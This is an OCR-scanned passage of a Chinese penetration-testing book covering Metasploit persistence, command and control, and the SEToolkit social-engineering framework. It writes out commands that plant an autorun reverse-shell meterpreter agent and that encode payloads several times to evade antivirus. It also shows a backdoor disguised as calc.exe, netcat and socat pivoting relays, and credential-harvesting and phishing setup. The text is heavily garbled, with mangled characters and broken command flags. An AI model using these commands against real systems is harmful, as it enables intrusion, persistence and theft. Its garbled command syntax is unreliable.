metsvc 脚 本 不 需要 认证 ， 一 旦 代理 被 植 入 ， 任 何人 可 以 远程 接 入 到 和 被 入 侵 系 统 。 大 多 数 攻击 者 不 会 不 修改 源 代 码 融 使用， 
例如 ， 需要 认证 或 者 确保 一 些 方 法 可 以 过 滤 SURE IE 车 接 。 


更 重要 的 是 ， 这 不 是 一 个 隐蔽 攻击 。 任 何 试图 列举 运行 进程 的 命令 ， 例 如 ， 在 meterpreter 提 示 符 后 输入 ps， 束 可 以 识别 


metsvc 服 务 ; 事实 上 ， 从 Temp 目 录 执 行 的 命令 是 最 可 疑 的 。 在 图 6.11 中 ，Temp 文 件 夹 中 带 有 随机 名 字 (CvjrsZWOMK) 的 目 
录 ， 这 是 系统 被 入 侵 的 明显 标志 。 


对 Temp 文 件 夹 进行 简单 检查 ,会友 现 存在 三 个 恶意 文件 ， 如 图 6.12 所 示 。 但 是 ， 在 手动 检查 前 ， 它 们 通 弟 已 经 锐 反 病毒 软 
件 标记 。 


1832 1660 wscript.exe xB6 OO RWBEGGS -1E6906/7\DigitalDefence 
C:\WINDOWS\System32\WScript .exe 
1988 6/2 £metsvc.exe x86 O NT AUTHORITY\SYSTEM 


C: NDOCLME-INDIGITA-1NXLOCALS-1XTempXCvj rsZWOMK\\metsvc .exe 


图 6.11 发 现 随机 文件 目录 


Address |© C:\Documents and Settings\DigitalDefence\Local Settings\Temp\CvirsZWOMK 
Folders | x 
& (C Documents and Settings 
E (C) Administrator 


四 | wa 
DD All Users EJ | j 
(C) Default User - [ | metsvc.exe 


3 (C3 DigkalDefence 

@ (C Application Data 
Cookies 

Desktop 

UP Favorites 

9 © Local Settings 
5 Application Data 
由 History 
E (C3 Temp 

e 


metsvc-server,exe 


A612 ”发现 恶意 文件 


6.3.2 ”使 用 persistence 脚 本 


获得 持久 性 ， 更 有 效 的 方法 是 在 meterpreter 提 示 符 后 输入 persistence 脚 本 。 


在 系统 被 入 侵 后 ， 迁 移 命令 已 经 从 最 初 的 shell 转 移 到 一 个 更 安全 的 服务 ， 攻 击 者 可 以 通过 在 meterpreter 命 令 提示 符 后 调用 
persistence 脚 本 。 


使 用 命令 中 的 -h 参 数 ， 可 以 识别 创建 可 持续 后 门 的 可 用 选项 ， 如 图 6.13 所 示 。 


meterpreter > run persistence -X -1 10 -p 444 -r 192.168.43.128 

[*] Running Persistance Script 

[*] Resource file for cleanup created at /root/.msf4/logs/persistence/RWBEGGS - 1E 
69067 20130918.1449/RWBEGGS-1E69067 20130918.1449.rc 


| 


‘| Creating Payload=windows/meterpreter/reverse tcp LHOST=192.168.43.128 LPORT= 


444 


‘| Persistent agent script is 611035 bytes Long 


Persistent Script written to C:\WINDOWS\TEMP\eRCatxBufilIB.vbs 


*] Executing script C:\WINDOWS\ TEMP\eRCqtxBufilTB.vbs 


Agent executed with PID 1360 


[*] Installing into autorun as HKLM\Software\Microsoft \Windows\CurrentVersion\Ru! 


n\YTpKALna 


WTpKAlna 


Installed into autorun as HKLM\Software\Mic rosoft \Windows\CurrentVersion\Run 


图 6.13  i&fTpersistence Pg A 


如 图 6.14 所 示 ， 我 们 已 经 配置 persistence 为 当 系 统 开局 时 目 动 局 动 ， 并 且 试 图 连接 监听 者 ， 频 率 为 每 10 秒 一 次 。 监 听 者 作 


为 远程 系统 (-r) ， 可 以 通过 特定 的 I|P 地 址 和 闯 口 被 识别 。 此 外 ， 我 们 可 以 选择 使 用 -U 选 项 ， 它 可 以 在 用 户 登 录 系 统 时 局 动 


persistence, 


4 
6906/7 20130918.1449/RWBEGGS-1E6906/ 20130918.1449.rc 


[^ 
444 
'] Persistent agent script is 611035 bytes Long 


\YTpKALna 


*] Running Persistance Script 


“| Executing script C:\WINDOWS\TEMP\eRCotxBufilTB.vbs 


“] Installing into autorun as HKLM\Software\Mic rosoft \Windows\CurrentVersion\Ru 
nXYTpKAlna 


preter > run persistence -X -i 10 -p 444 -r 192.168.43.128 


| Resource file for cleanup created at /root/.msf4/logs/persistence/RWBEGGS - 1E 


| Creating Payload=windows/meterpreter/reverse tcp LHOST=192.168.43.128 LPORT= 


Persistent Script written to C:XWINDOWSXTEMPNeRCqtxBufil IB.vbs 


Agent executed with PID 1360 


Installed into autorun as HKLM\Software\Mic rosoft \Wincows\CurrentVersion\Run 


图 6.14 使 用 persistence 脚 本 


请 注意 ，persistence 使 用 的 是 随机 端口 444， 攻击 者 必须 验证 本 地 防火 墙 的 配置 ， 确 保 端 口 开启 ， 或 者 使 用 reg 命 令 来 开启 该 庙 口 
与 大 多 数 Metasploit 模 块 一 样 ， 任 何 长 期 没有 使 用 的 端口 都 可 以 选择 。 


persistence 脚 本 位 于 临时 目录 中 的 一 个 VBS 文 件 中 ， 自 然 ， 你 可 以 用 -L 选 项 来 选择 不 同 的 位 置 。 该 脚本 还 把 此 文件 加 入 到 


注册 表 的 本 地 目 动 运行 部 分 


因为 persistence 脚 本 没有 经 过 认证 ， 所 有 人 都 可 以 使 用 它 访 问 被 入 侵 系 统 ， 当 友 现 或 者 渗透 测试 完成 后 ， 它 应 该 从 被 入 侵 


系统 中 立即 删除 。 可 以 通过 如 下 resource 命 令 来 删除 脚本 和 确认 资源 文件 的 位 置 已 被 清理 


meterpreter> run multi console command -rc 


/root/.msf4/logs/persistence/RWBEGGS- 
1E69067 20130920.0024/RWBEGGS-1E69067 20130920.0024.rc 


6.4 使 用 Metasploit 框 架 创 建 一 个 独立 持久 代理 


Metasploit 框 架 可 以 用 来 创建 独立 的 可 执行 文件 ， 它 可 以 保留 在 被 入 侵 的 系统 中 ， 并 允许 交互 通信 。 独 立 包 涂 的 优点 在 
于 ， 它 可 以 提前 准备 和 测试 用 以 确认 连接 ， 可 以 编码 来 绕 过 本 地 反 病 毒 软件 。 


在 Kali 中 ， 在 命令 提示 符 后 启动 msfconsole， 来 创建 一 个 简单 独立 的 代理 。 


使 用 msfpayload 创 建 持久 代理 。 在 如 图 6.15 所 示 的 例子 中 ， 使 用 reverse tcp shell 来 配置 代理 。 它 将 连接 到 本 地 主机 
192.168.43.130 的 4444 端 口 ， 代 理 名 为 attack1.exe， 使 用 win32 可 执行 程序 模板 。 


独立 执行 的 代理 仅仅 工作 在 没有 安 半 反 病 毒 软件 的 被 入 侵 系统 上 ， 或 者 是 用 适当 的 meterpreter 命 令 使 凡 病 毒 软 件 失效 的 环 
境 上 。 为 了 绕 开 反 病 毒 软件 ， 后 门 必 须 编码 。 在 编码 载体 时 ， 有 不 同 的 选项 ， 如 图 6.16 所 示 。 


mst > msfpayload windows/meterpreter/reverse tcp LH0SI[-192.1658.43.130 LPORI-24444 
x > /root/Desktop/attackl.exe | 
[*] exec: msfpayload windows/meterpreter/reverse tcp LHOST=192.168.43.130 LPORT=| 


4444 x > /root/Desktop/attackl.exe 


Created by msfpayload (http://www.metasploit.com). 
Payload: windows/meterpreter/reverse tcp 
Leng-h: 290 


Options: ("LHOST"-»"192.168.43.130", "LPORT"-»"4444"] 


图 6.15 ”使 用 reverse_tcp shell 配 置 代理 
Usage: /opt/metasploit/apps/pro/msf3/msfencode «options» 
OPTIONS: 


-a «opt» The architecture to encode as 

-b «opt» Ihe List of characters to avoid: 'NxOOXxff' 

-CE «opt» The number of times to encode the data 

-d «opt» Specify the directory in which to Look for EXE templates 
-e «opt» The encoder to use 


-h Help banner 

-i «opt» Encode the contents of the supplied file path 

-K Keep template working; run payload in new thread (use with -x) 
=| List available encoders 

-m «opt» Specifies an additional module search path 

-n Dump encoder information 


-0 «opt» The output file 
-Dp «opt» The platform to encode for 
-5 «opt» The maximum size of the encoded data 
-t «opt» The output format: raw,ruby,rb,perl,pl,bash,sh,c,csharp,js be,js l 
e,java,python,py,powershell,psl,vbscript,vbapplication,dll,exe,exe-service,exe-s 
mall,exe-only,elf,macho,vba, vba-exe,vbs,loop-vbs,asp,aspx,war,psh,psh-net 
-V Increase verbosity 
-x «opt» Specify an alternate executable template 


图 6.16 ”编码 载荷 的 不 同 选 项 


可 以 通过 show encoders 命 令 来 查看 可 用 选项 。 
Metasploit 使 用 近 30 种 不 同 的 编码 器 ， 黑 认 情 况 下 ， 如 果 没 有 指定 编码 器 ，Metasploit 会 选择 最 合适 的 编码 器 。 


shikata_ga_nai 是 一 个 好 的 并 且 通 用 的 编码 器 。 此 编码 器 对 4 个 字 蔬 的 密 铀 采用 多 态 XOR 添 加 反馈 进行 编码 ， 并 且 它 是 被 
Metasploit 评 为 “优秀 ”的 唯一 一 款 编码 器 。 


我 们 使 用 如 下 命令 来 编码 之 前 准备 好 的 attack.exe 代 理 : 


msf>msfencode -1 attack.exe -o encoded attack.exe -e 
x86/shikata ga nai -c 5 -t exe 


使 用 shikata ga_nai 协 议 ， 对 attack.exe 代 理 进 行 五 次 编码 。 每 一 次 都 是 对 上 一 次 结果 的 重新 编码 ， 这 样 束 更 难 侦 测 到 。 但 
是 ， 可 执行 文件 的 大 小 也 在 增加 。 


全 部 有 效 载 集 都 可 以 直接 从 Kali 命 令 行 直接 创建 。 它 不 仪 可 以 被 编码 ， 而 且 我 们 可 以 配置 编码 模式 来 避免 某 些 字 竺 。 例 如 ， 
当 编 码 一 个 持久 代理 时 ， 应 避免 如 下 的 字符 ， 因 为 它们 可 能 被 友 现 ， 从 而 导致 攻击 失败 。 

\x00 代 表 0 字 市 地 址 

Axat RRIT 

`\xagd 代 表 回 车 


使 用 如 下 命令 来 创建 多 次 编码 载 何 : 


msf>msfpayload windows/meterpreter/bind tcp 
LPORT-444 R| msfencode -e x86/shikata ga nai -c 5 -t raw -a 
x86 -b '\x00\x0a\x0d' -c 5 -x /root/Desktop/attack.exe -o 
/root/Desktop/encoded attack.exe 


你 可 以 编码 msfpayload 到 现 有 的 可 执行 文件 中 。 修 改 的 可 执行 文件 和 持久 代理 都 能 工作 。 为 了 绑 定 持久 代理 到 可 执行 广 
件 ， 比 如 计算 器 (calcexe) ， 首 先 复 制 适当 的 calc.exe 文 件 到 位 于 /usr/share/metasploit-framework/data/templates 的 
Metasploit 模 板 文 件 夹 中 。 当 模板 束 位 时 ， 使 用 如 下 命令 : 


msf>msfpayload windows/meterpreter/bind tcp 


LPORT-444 R| msfencode -t exe -x calc.exe -k -o 
encoded calc attack.exe -e x86/shikata ga nai -c 5 


代理 可 以 被 放置 到 目标 系统 上 ， 重 命名 为 calc.exe， 取 代 原 来 的 计算 器 ， 随 后 执行 。 


不 平 的 是 ， 几 平 所 有 Metasploit 编 码 的 可 执行 文件 都 能 被 客户 的 反 病 毒 软件 检测 到 。 这 归 因 于 渗 通 测试 者 提交 加 密 的 载体 
到 网 站 ， 比 如 VirusTotal (www.virustotal.com) 。 然 而 ， 可 以 创建 一 个 可 执行 文件 ， 然 后 用 Veil-Evasion 进 行 加密 ， 上 有 具体 内容 
请 参见 第 4 章 。 


6.5 ” 重 定 同 端 口 来 绕 过 网 络 控 制 


到 目前 为 止 , 我 们 已 经 研究 了 远程 控制 接 入 被 攻击 系统 ， 犹 如 受害 者 和 攻击 者 之 间 的 机 器 有 一 个 直接 的 联系 。 但 是 ， 这 些 连 
接 经 党 被 控制 ， 或 者 被 网 络 设备 (如 防火 墙 ) 封锁 。 攻 击 者 可 以 使 用 端口 重 定 同 来 绕 过 这 些 控 制 ， 这 是 一 种 指定 系统 ， 通 过 监听 
已 定义 的 端口 和 转 友 原始 数据 包 到 特定 的 第 二 位 置 。 


Kali 提 供 一 些 支持 端口 重 定向 的 工具 ， 包 括 nc、cryptcat、socat、ssh、fpipe 和 Metasploit 的 meterpreter。 在 下 面 的 章节 
中 我 们 将 介绍 一 些 例 子 。 


6.5.1. 示例 1 一 一 简单 山口 重 定 同 


简单 端口 重 定向 可 能 会 被 用 到 。 比 如 ， 如 果 你 已 经 攻破 了 处 于 网 络 边缘 的 一 个 系统 ， 它 位 于 非 军 事 区 (Demilitarized 
Zone, DMZ) ， 并 且 需 要 与 远程 位 置 的 内 部 系统 进行 通信 。 


在 DMZ 的 受 攻击 系统 上 ， 用 如 下 命令 来 配置 Netcat 实 例 ， 监 听 传 入 的 命令 ， 并 且 转 发 到 目标 上 。 


root@kali:~# nc -1 -p 44444 -e <TAGET IP> 444 


该 命令 将 调用 Netcat (nc) 来 监听 (-l) 传 入 的 流量 ,执行 (Ce) 流量 的 转移 动作 到 目标 的 444 端 口 。 端 口 并 不 固定 ,无论 
是 监听 / 转 友 主机 还 是 目标 主机 ， 端 口 不 必 相 同 。 


如 果 缺 少 关 于 目标 内 部 网 络 的 完整 信息 ， 可 以 尝试 如 下 命令 : 


root@kali:~# nc -1 -p «local listening port» -c "nc <TARGET IP> 
<TARGET port» 


命令 设置 了 本 地 (攻击 者 ) Netcat 实 例 ， 来 监听 (-l) 指定 端口 。 然 后 指示 Netcat 同 每 一 个 新 的 连接 (-c) 创建 一 个 新 的 进 


这 个 简单 的 例子 允许 外 部 直接 连接 到 了 网络 。 但 是 ， 它 不 允许 双向 数据 连接 ， 这 需要 一 些 其 他 工具 。 
6.5.2. zn 92 — UB eum SEA 


考虑 三 个 单独 的 Windows 数 据 系统 : 


[攻击 者 ] | (RA) | [目标 ] 


为 了 用 Netcat 开 启 一 个 双向 通信 信道 ， 我 们 不 得 不 使 用 命名 管道 。 命 名 管道 ， 也 称 为 FIFO， 是 一 种 创建 内 部 进程 通信 的 方 
法 ; 这 使 我 们 能 够 把 它 作为 对 象 进行 处 理 ， 使 得 当 发 出 命令 时 ， 管 理 更 容易 。 在 下 面 的 攻击 例子 中 ， 我 们 创建 了 一 个 名 为 
everseto 的 命名 管道 来 处 理 双向 通信 。 


攻击 者 在 本 地 系统 上 有 Netcat 实 例 ， 使 用 如 下 命令 来 监听 痛 口 6661 : 


nc -l 6661 


转 上 器， 一 个 家 入侵 的 盒子 ， 具 有 Netcat 安 和 妆 实 例 ， 可 以 监听 传 入 的 数据 包 ， 并 将 其 转 友 到 目标 。 使 用 如 下 命令 进行 配 
置 ， 来 监听 端口 6666: 


nc -l 6666 
在 目标 系统 上 ， 输 入 如 下 命令 来 创建 命名 管道 : 
mkfifo reverse 


随后 ， 配 置 Netcat 本 地 实例 ， 使 用 命名 管道 来 建立 跨越 转 友 系统 到 攻击 者 的 双向 通信 ， 命 令 如 下 : 


nc localhost 6661 O<reverse | nc localhost 6666 l»reverse 


可 以 用 socat 来 获得 同样 的 双 同 数据 流 ， 它 被 设计 为 实施 这 种 类 型 的 连接 。 此 例子 的 命令 可 以 从 目标 系统 执行 ， 命 令 如 下 : 


socat tcp:localhost:6661 tcp:localhost:6646 


6.6 Me 


在 本 章 中 ， 我 们 关注 攻 击 者 杀 链 的 最 后 阶段 一 一 命令 、 控 制 和 通信 阶段 。 在 此 阶段 中 ， 攻 击 者 使 用 持久 代理 与 被 入 侵 系统 


进行 通信 。 
以 此 结束 本 书 的 第 一 部 分 ， 在 其 中 我 们 详细 研究 了 攻击 者 的 杀 链 ， 看 它 如 何 应 用 于 被 入 侵 网 络 或 者 孤立 的 系统 。 


在 第 二 部 分 交付 阶段 中 ， 我 们 将 通过 不 同 的 攻击 途径 ， 研 究 杀 链 的 具体 应 用 。 第 7 章 物理 攻击 和 社会 工程 学 ， 天 注 于 物理 安 
全 和 社会 工程 攻击 。 话 题 将 包括 攻击 方法 概述 ， 制 作恶 意 的 USB 设 备 和 流 谍 微 机 ， 社 会 工程 工具 包 ， 以 及 测试 系统 对 钓鱼 攻击 的 
抵御 能 力 。 


第 7 章 ”物理 攻击 与 社会 工程 学 

@ 第 8 章 ”利用 无 线 通信 

@ 第 9 章 ”基于 Web 应 用 的 侦察 与 利用 
@ 第 10 章 ”利用 远程 访问 通信 


se 第 11 章 ”客户 痛 攻击 技术 详解 


Blea ”物理 攻击 与 社会 工程 学 


在 渗透 测试 和 真实 攻击 中 ， 社 会 工程 学 是 最 有 效 的 攻击 万 法 之 一 ， 特 别 是 在 与 目标 系统 的 物理 访问 相 结 合 的 时 候 。 


作为 一 种 支持 攻击 杀 链 的 攻击 路 径 ， 社 会 工程 学 关注 的 是 非 技术 方面 的 攻击 ， 具 体 来 说 束 是 利用 人 的 信任 天 系 或 者 内 部 人 员 
的 帮助 ， 通 过 欺骗 的 手段 入 侵 一 个 网 络 及 其 资源 。 
社会 工程 学 攻击 能 够 成 功 的 关键 因素 有 以 下 两 个 : 


在 侦察 阶 段 获取 的 信息 ， 攻 击 者 必须 知道 目标 的 名 称 和 用 户 名 称 ， 更 重要 的 是 ， 攻 击 者 要 和 弄 清楚 目标 网 络 中 用 户 所 关注 的 东西 。 
弄 清楚 如 何 利用 这 些 信息 ， 劝 说 可 能 的 目标 点 击 东 个 链接 或 者 执行 茶 个 程序 ， 从 而 进行 攻击 。 例 如 ， 如 果 目 标 企业 与 之 前 的 竞争 对 手 合并 不 


久 ， 那 么 员工 的 工作 安全 就 是 最 受 关 注 的 。 因 此 ， 标 题 的 内 容 与 上 述 话题 有 关 的 邮件 或 者 文档 ， 更 容易 被 目标 企业 的 员工 打开 。 


Kali Linux 提 供 了 一 些 工具 和 框架 ， 再 利用 社会 工程 去 影响 受害 者 ， 使 其 打开 文件 或 执行 某 些 操 作 时 ， 这 些 工 具 和 框架 能 够 
增加 成 功 的 机 会 。 在 提供 的 实例 中 ， 包 括 了 脚本 攻击 (例如 Visual Basic、WMI 和 Powershell 脚 本 ) 、 使 用 Metasploit 框 架 生 
成 的 可 执行 文件 和 浏览 器 攻击 框架 (The Browser Exploitation Framework, BeEF) 。 


本 章 集中 介绍 社会 工程 学 工具 包 SEToolkit (Social-Engineer Toolkit) 。 本 章 所 介绍 的 相关 工具 的 技术 可 以 作为 使 用 其 他 
工具 进行 社会 工程 学 攻击 时 的 参考 模型 。 


在 本 章 最 后 部 分 ， 将 介绍 如 何 使 用 SEToolkit 工 具 包 完成 以 下 操作 : 


使 用 网 络 钓鱼 和 Java 小 程序 攻击 来 获取 目标 系统 的 脚本 。 
使 用 攒 据 收割 攻击 饮 取 或 者 收集 用 户 名 和 密码 。 

进行 标签 钓鱼 和 网 页 项 进攻 击 。 

使 用 多 种 Web 混 合 攻击 。 


.使 用 PowerShe1L1 字 母 数 字 的 she11coqe 注 入 攻击 。 


为 了 支持 SET 工 具 包 进行 社会 工程 攻击 ， 下 面 将 描述 一 般 的 实现 实践 : 


隐藏 恶意 的 可 执行 文件 和 伪装 攻击 者 的 URL。 
:使 用 DNS 重 定 同 来 升级 攻击 。 


本 章 还 会 介绍 如 何 使 用 Raspberry PI 微电脑 设计 ， 实 现 恶 意 的 物理 设备 。 


71 社会 工程 工具 包 


社会 工程 工具 包 (SEToolkit) 由 David Kennedy (ReL1K) 设计 并 开发 ， 并 由 一 群 活跃 的 合作 者 进行 维护 (www.social- 
engineer.org) 。 设 工具 包 是 开源 的 python 驱 动 (python-driven) 框架 ， 主 要 为 协助 社会 工程 攻击 而 设计 。 


SEToolkit 的 一 个 重要 的 优点 在 于 它 可 以 和 Metasploit 框 架 进 行 相互 连接 ， 而 Metasplot 框 架 提 供 了 攻击 ， 通 过 加 密 绕 过 防 
火 墙 ， 以 及 当 目 标 系 统 返 回 shell 时 进行 连接 的 监听 等 模块 所 需要 的 平台 。 


在 运行 SEToolkit 之 前 ， 可 能 需要 对 配置 文件 进行 一 些 必 要 的 修改 。 


社会 工程 工具 包 的 预 配置 使 用 一 般 的 默认 设置 ， 这 些 配置 可 以 进行 修改 ， 以 适应 工具 在 特殊 的 攻击 场景 中 的 使 用 。 在 Kali 
linux 中 ， 配 置 文件 的 路 径 为 “/usr/share/set/config/set_config”。 通 过 对 配置 文件 进行 修改 ， 可 以 改变 以 下 功能 : 


-Metasploit 的 变量 ， 包 括 路 径 、 使 用 的 数据 库 、 一 个 载 三 补 编 码 的 次 数 、 建 立 一 个 meterpreter 会 话 后 需要 自动 执行 的 命令 等 


HJ “x “于 o 


:Ettercap 和 dsniff 开 关 ， 用 于 协助 进行 DNS 重 定 癌 攻击 ， 急 取 认证 所 需 的 证 书 。 通 过 对 DNS 的 控制 ， 攻 击 者 可 以 将 一 组 用 户 的 网 站 访问 转移 
到 一 个 由 SEToolkit 生 成 的 网 站 。 


sendmail 和 其 他 邮件 程序 的 配置 ， 用 于 为 攻击 提供 伪造 的 email 地 址 ， 通 过 使 用 可 信 的 email 地 址 ， 例 如 同一 个 公司 中 职位 较 高 的 管理 人 员 
的 email 地 址 ， 使 得 社会 工程 攻击 更 容易 被 相信 。 


:邮件 提供 两 的 设置 ， 例 如 Gmail、Hotmail 和 Yahoo。 


使 用 伪造 的 发 布 首 、 活 跃 的 SSL 认 证 和 和 估 取 得 到 的 数字 签名 ， 创 建 目 签名 的 Java 小 程序 。 
其 他 变量 ， 例 如 IP 地 址 、 端 口 分 配 、 编 码 参数 等 。 
为 了 在 Kali 的 发 行 版 中 打开 社会 工程 工具 包 (SET) ， 可 以 进入 以 下 路 径 “Applications/Kali Linux/Exploitation 


Tools/Socail Engineering Toolkit/setoolkit" ， 或 者 在 命令 行 中 输入 “setoolkit” 。 打 开 SET 后 ， 首 先 会 看 到 如 图 7.1 所 示 的 主 
界面 。 


如 果 选 择 社会 工程 攻击 (“1) Social-Engineering Attacks" ) ， 会 出 现 如 图 7.2 所 示 的 子 菜单 。 


Select from the menu: 


social-Engineering Attacks 
Fast-Irack Penetration Testing 
Third Party Modules 

Update the Metasploit Framework 
Update the Social-Engineer Toolkit 
Update SET configuration 

Help, Credits, and About 


Exit the Social-Engineer Toolkit 


图 7.1 ”社会 工程 工具 包 SEToolkit 主 界面 


Select from the menu: 


Spear-Phishing Attack Vectors 
Website Attack Vactors 
Infectious Media Generator 
Create a Payload and Listener 
Mass Mailer Attack 
Arduino-Based Attack Vector 
SMS Spoofing Attack Vector 
WireLess Access Point Attack Vector 
QüRCode Generator Attack Vector 
Powershell Attack Vectors 
Third Party Modules 


Return back to the main menu. 


图 7.2 SEToolkit#9Social-Engineering Attacks 子 菜单 


以 下 对 社会 工程 攻击 做 简单 介绍 
网 络 钓鱼 攻击 癌 量 (Spear-Phishing Attack Vector) ， 攻 击 者 创建 邮件 信息 ， 并 使 用 附加 漏洞 将 信息 发 送 给 目标 受害 者 。 
网 站 攻击 向 量 (Website Attack Vectors) ， 使 用 多 重 基于 Wep 的 攻击 ， 包 括 : 


Java 小 程序 攻击 方法 (Java Applet Attack Method) ,伪造 一 份 Java 证 书 ， 并 且 运 行 一 个 基于 Metasploit 的 载荷 。 该 攻击 是 最 
成 功 的 攻击 之 一 ， 可 以 有 效 地 针对 Windows、Linux 和 OSX 目 标 进 行 攻击 。 


: Metasploit 浏览 器 利用 方法 (Metasploit Browser Exploit Method) ， 使 用 iFrame 攻 击 ， 运 行 一 个 Metasploit 载 荷 。 


- 凭据 收割 机 攻击 方法 (Credential Harvester Attack Method) ， 对 网 站 进行 复制 ， 并 且 通 过 对 POST 参数 进行 重 写 ， 使 得 攻 


击 者 可 以 拦截 并 且 窃 取 用 户 的 凭证 。 当 窃取 完成 后 ， 将 受害 者 重 定 向 回 原来 的 网 站 。 


JI 


` 标签 钓鱼 攻击 方法 (Tabnabbing Attack Method) ， 对 一 个 非 活动 的 浏览 器 标签 页 面 进行 复制 ， 修 改 复制 后 的 页 面 ， 使 其 
与 攻击 者 相连 接 ， 最 后 使 用 该 页 面 替 换 原 有 标签 信息 。 当 用 户 登 录 该 页 面 时 ， 用 户 的 凭证 将 会 发 送 给 攻击 者 。 


网 页 顶 进 攻击 方法 (Web Jacking Attack Method) ， 使 用 iFrame 替 代 ， 合 法 地 将 某 些 URL 连 接 设 置 为 高 亮度 。 当 该 链接 被 


点 击 时 弹出 一 个 窗口 ， 该 窗口 连接 到 一 个 恶意 链接 。 


- 综合 攻击 网 页 方法 (Multi-Attack Web Method) ， 允 许 一 个 攻击 者 选择 若干 ， 或 者 全 部 可 以 同时 使 用 的 攻击 手段 ， 包 括 
Java 小 程 友 攻 击 方法 、Metasploit 浏 览 器 攻击 方法 、 任 证 收割 攻击 方法 、 标 签 钓 鱼 攻 击 方法 ， 以 及 中 间 人 攻击 方法 等 。 
SS RGR ARE (Infectious Media Generator) ， 后 成 一 个 autorun.inf 文 件 和 Metasploit 和 载荷 。 一 旦 受 感染 USB 设 备 或 者 物 
理 介质 (CD 或 DVD) 插入 到 目标 系统 ， 会 自动 运行 (前 提 是 开启 autorun 选 项 ) 并 且 感染 (compromise) 目标 系统 。 


创建 负载 并 进行 监听 (Create a Payload and Listener) 模块 ， 是 创建 一 个 Metasploit 载 何 的 快速 菜单 驱动 方法 。 攻 击 者 必须 使 用 单 
独 的 社会 工程 攻击 欺骗 目标 运行 该 模块 。 


:大 规模 邮件 攻击 (MassMailer Attack) ， 人 允许 攻击 者 使 用 多 个 用 户 问 某 个 email 地 址 ， 或 者 一 组 接收 者 发 送 邮 件 。 


基于 Arduino 的 攻击 问 量 (Arduino-Based Attack Vector) ， 通 过 对 基于 Arduino 的 设备 写 入 程序 实现 ， 例 如 Teensy。 因 为 ， 这 些 设 
备 在 物理 连接 Windows 操 作 系 统 时 ， 注 册 为 USB 接 口 的 键盘 设备 ， 因 此 可 以 茶 用 autorun， 或 者 对 其 他 的 终端 进行 安全 保护 。 


:短信 期 骗 攻 击 同 量 (SMS Spoofing Attack Vector) ， 可 以 让 攻击 者 癌 某 人 的 移动 设备 发 送 自 定义 的 短信 服务 (Short Message 
Service) 文本 ， 并 且 对 消息 的 来 源 进 行 伪 造 。 


:无线 接 入 点 攻击 癌 量 (Wireless Access Point Attack Vector) ， 可 以 在 攻击 者 的 操作 系统 中 创建 一 个 伪造 的 无 线 接 入 点 和 DHCP 服 务 
髓 ， 并 且 将 DNS 解析 请 求 重 定 同 到 攻击 者 的 系统 。 攻 击 者 随后 可 以 进行 一 系列 攻击 ， 例 如 Java 小 程序 攻击 或 者 凭证 收割 攻击 。 


:二 维 码 生成 攻击 向 量 (ORcode Generator Attack Vector) ， 生 成 一 个 与 攻击 的 URIL 有 关 的 二 维 码 。 


‘Powershell Mit ln] st (Powershell Attack Vectors) ， 文 持 攻 击 者 进行 依赖 于 PowerShell (有 所 有 Windows Vista 及 其 以 后 版 本 ， 拥 
有 的 命令 行 解释 器 和 脚本 语言 ) 的 攻击 


第 三 方 模块 (Third Party Modules) ， 文 持 攻 击 者 使 用 远程 管理 工具 汤 米 版 (Remote Administration Tool Tommy 
Edition, RATTE) 作为 Java 小 程序 攻击 的 一 部 分 ， 或 者 作为 一 个 独立 的 载 集 。RATTE 是 一 个 文本 驱动 的 远程 访问 工具 。 


SEToolkit 也 提供 了 支持 快速 跟 路 渗透 测试 (Fast-Track Penetration Testing) 的 菜单 项 。 快 速 跟 路 渗透 测试 支持 对 一 些 特 
殊 工具 的 快速 访问 ， 例 如 支持 暴力 破解 认证 和 SQL 数 据 库 密码 破解 ， 还 有 一 些 基于 Python、SCCM 攻 击 向 量 、Dell computer 
DRAC/chassis 攻 击 、 用 户 枚 举 和 PSEXEC PowerShell 注 入 等 的 客户 端 攻击 。 


快速 跟踪 渗透 测试 菜单 项 同时 也 提供 对 Metasploit Framework、SEToolkit 和 SEToolkit 配 置 的 升级 功能 。 但 是 ， 由 于 Kali 
并 不 支持 全 部 的 额外 选项 ， 而 且 这 些 额 外 选项 可 能 会 造成 依赖 性 干扰 ， 因 此 要 尽量 避免 使 用 。 


作为 展示 SEToolkit 的 强大 功能 的 第 一 个 例子 ， 将 会 展示 如 何 获取 一 个 远程 shell， 通 过 被 入 侵 系统 连接 攻击 者 的 系统 。 


7.1.1 网络 钓鱼 攻击 曝光 


钓鱼 攻击 是 针对 大 量 受害 者 的 邮件 诈骗 攻击 ,例如 ， 对 已 知 的 美国 互联 网 用 尸 列表 进行 攻击 。 一 般 情 况 下 ， 无 法 直接 连接 目 


标 ， 并 且 邮 件 也 不 针对 某 个 指定 目标 。 相 反 ， 邮 件 一 般 包 含 很 多 人 都 感 兴趣 的 话题 (DURO, Am), HEBAT 
链接 或 附件 。 出 于 好 奇 心 ， 总 会 有 一 些 人 会 点 击 链接 或 者 附件 ， 从 而 触 皮 攻击。 


从 另 一 方面 来 况 ， 网 络 钓鱼 是 钓鱼 攻击 的 一 种 特殊 的 万 式 。 通 过 特殊 的 万 法 ， 手 工 生成 email 消 息 ， 攻 击 者 希望 吸引 特定 人 
群 的 注意 。 例 如 ， 如 果 攻 击 者 得 知 销售 部 门 使 用 特殊 的 系统 管理 客户 天 系 ， 他 可 以 伪造 一 封 来 自 系统 开 上 友 商 的 邮件 ， 主 题 为 “< 
应 用 > 紧急 修复 补丁 一 一 点 击 链 接 下 载 ”。 


忆 _ 般 情况 下 ， 的 鱼 攻 击 的 成 功率 低 于 5s， 然 而 ， 鱼 又 攻击 成 功率 的 范围 达到 40s~80s。 这 也 证 明了 前 期 信息 搜集 阶段 是 该 类 攻击 成 功 的 决 
定性 因素 。 在 平均 情况 下 ， 每 发 送 10~15 封 邮件 才 会 有 1 人 进行 点 击 。 


在 发 起 攻击 之 前 ， 要 确保 Kali 中 已 安装 了 Sendmail (apt-get install sendmail) ， 并 且 将 配置 文件 set config 中 的 
SENDMAIL=OFF 和 选项， 修改 为 SSNDMAIL=ON。 


为 了 加 载 一 个 攻击 ， 从 SEToolkit 荣 单 中 选择 社会 工程 攻击 (Social Engineering Attacks) ， 然 后 在 子 菜单 中 选择 网 络 钓鱼 
攻击 选项 (Spear-Phishing Attack Vectors) 。 此 时 会 加 载 该 攻击 的 开始 选项 ， 如 图 7.3 所 示 。 


The Spearphishing module allows you to specially craft email messages and send 
them to a large (or small) number of people with attached fileformat malicious 
payloads. If you want to spoof your email address, be sure "Sendmail" is in- | 
stalled (apt-get install sendmail) and change the config/set config SENDMAIL-OFF | 
flag to SENDMAIL=ON. 


There are two options, one is getting your feet wet and letting SET do 
